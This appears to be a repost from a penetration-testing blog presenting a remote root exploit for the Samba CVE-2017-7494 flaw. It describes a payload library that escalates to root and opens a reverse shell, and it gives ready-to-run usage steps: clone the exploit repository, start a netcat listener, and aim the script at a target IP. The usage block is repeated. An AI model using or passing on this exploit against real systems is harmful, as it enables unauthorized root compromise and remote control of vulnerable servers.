Remote root exploits for the SAMBA CVE-2017-7494 vulnerability.

HoChi-Minh / June 6, 2017 / Comments Off / Exploits, Networking, Penetration Test

Remote root exploit for the SAMBA CVE-2017-7494 vulnerability.
This exploit is divided in 2 parts:
1. First, it compiles a payload called “implant.c” and generates a library (libimplantx32.so or libimplantx64.so) that changes to the root user, detaches from the parent process and spawns a reverse shell.
2. Second, it finds a writeable share in the specified target host, uploads the library with a random name and tries to load it.

CVE-2017-7494

As long as the target is vulnerable and the payload is the correct for the target operating system and architecture, the exploit is 100% reliable

Usage:

git clone https://github.com/joxeankoret/CVE-2017-7494 && cd CVE-2017-7494
python2 cve_2017_7494.py
$ nc -p 31337 -l
$ python cve_2017_7494.py -t target_ip

git clone https://github.com/joxeankoret/CVE-2017-7494 && cd CVE-2017-7494

python2 cve_2017_7494.py

$ nc -p 31337 -l

$ python cve_2017_7494.py -t target_ip

Source: https://github.com/joxeankoret

Tags: payload, RCE(Remote Code Execution), ReverseShell, samba

Archives

Remote root exploits for the SAMBA CVE-2017-7494 vulnerability.